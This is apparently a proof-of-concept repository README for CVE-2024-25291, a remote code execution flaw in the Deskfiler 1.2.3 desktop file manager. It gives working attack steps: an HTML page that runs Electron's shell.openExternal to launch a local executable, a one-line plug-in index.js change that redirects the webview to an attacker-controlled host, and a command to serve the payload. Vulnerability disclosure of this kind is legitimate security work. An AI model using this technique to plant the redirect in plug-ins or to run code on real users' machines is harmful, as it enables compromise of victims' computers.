
CVE-2024-25291 PoC: Deskfiler security vulnerability

Source
Associated Vulnerability
Title: Deskfiler security vulnerability (CVE-2024-25291)
Description: Deskfiler is a desktop file manager. Deskfiler v1.2.3 contains a security vulnerability that allows an attacker to execute arbitrary code by uploading a crafted plugin.
Description
PoC for CVE-2024-25291
Readme
# DeskFiler RCE

A proof of concept for the CVE-2024-25291 vulnerability.

deskfiler 1.2.3 allows an Electron webview in the application, with resultant remote code
This repository contains an example vulnerable application and a proof-of-concept (PoC) exploit for it.

As a PoC, a Python file automates the process.
---------------------------------------

#### 1. Vulnerability Overview:
 * Vulnerability Subject: Remote code execution via open redirect in an Electron webview
 * Vulnerable Version: deskfiler-1.2.3
 * Where the Issue Manifests: Electron webview
 * Attack Type: Remote Code Execution
 * Attack Vector: The victim must install and open the malicious plug-in.
 * Reserved CVE Number: CVE-2024-25291

---------------------------------------

#### 2. Vulnerability Cause:
* Exploit explanation
  * In a specific part of the application, a webview created by Electron was found to load an external link. A plug-in can redirect that webview to an attacker-controlled server, and, as the PoC shows, the page loaded there can call `require('electron')`, so it runs with Node integration rather than as an ordinary sandboxed web page. The attacker's page therefore executes with the privileges of the application, which yields RCE.

Proof-of-concept (POC)
----------------------
* Step 1) Prepare the attacker's server and create the malicious plug-in. The page below is what the attacker's server delivers to the webview; it uses the Electron `shell` module, available because the page runs with Node integration, to launch a local executable.
```html
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>
```

※ For a quick test, serve the page from the attacker's machine with the following command (the snapshot ships the page as `jruru.html`; serve it under the name the redirect below uses):

```sh
$ python -m http.server 80
```

**Note:** ※ The plug-in here is one generated by the attacker: an otherwise normal plug-in with a single line added that makes it load the attacker's server. BareBone was chosen for simple testing.
![deskfiler1](https://github.com/QnA4u/CVE/assets/131337101/b03cddf8-0656-4b14-8dbc-807e40673730)

Afterward, add the following line to the index.js file in the BareBone plug-in folder:
```js
window.location='http://[attacker_ip]/hack.html'
```

* Step 2) On the victim's machine, run Deskfiler and install the BareBone plug-in through "Add new plugin." When the plug-in is opened, its index.js redirects the webview to the attacker's page, which calls `shell.openExternal` and launches calc.exe.
![deskfiler2](https://github.com/QnA4u/CVE/assets/131337101/5b351a9d-7fdd-4b89-b73b-7bfd01f3d9a4)

![deskfiler3](https://github.com/QnA4u/CVE/assets/131337101/059ed94e-df61-4c78-800d-60e8db442696)

---------------------------------------

### 3. Additional Information
 In this PoC we used a plug-in; however, we believe that other attack vectors could achieve remote code execution (RCE) on their own. Additionally, if server-side vulnerabilities such as stored or reflected XSS exist in content the webview loads, RCE is also feasible.
File Snapshot

```
/data/pocs/9bceba585fdb1f9d198e58485405dbe5b20396eb
├── [ 193] jruru.html
└── [2.5K] README.md

0 directories, 2 files
```